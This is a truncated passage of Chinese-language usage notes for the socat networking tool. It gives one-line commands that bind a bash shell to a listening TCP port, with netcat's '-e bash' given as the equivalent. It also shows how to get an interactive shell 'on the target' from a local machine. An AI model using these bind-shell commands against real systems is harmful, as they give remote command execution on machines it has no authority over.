socat
r:23 连接到服务器的23端口,即可获得一个cmd shell。readline是gnu的命令行编辑器,具有历史功能。向远处端口发数据 echo “test” | socat – tcp-connect:127.0.0.1:12345本地开启端口 socat tcp-l:7777,reuseaddr,fork system:bash 同nc -l -p 7777 -e bash。执行bash的完美用法 在目标上 socat tcp-l:8888 system:bash,pty,stderr 本地 socat readline tcp:$target:8888 用readl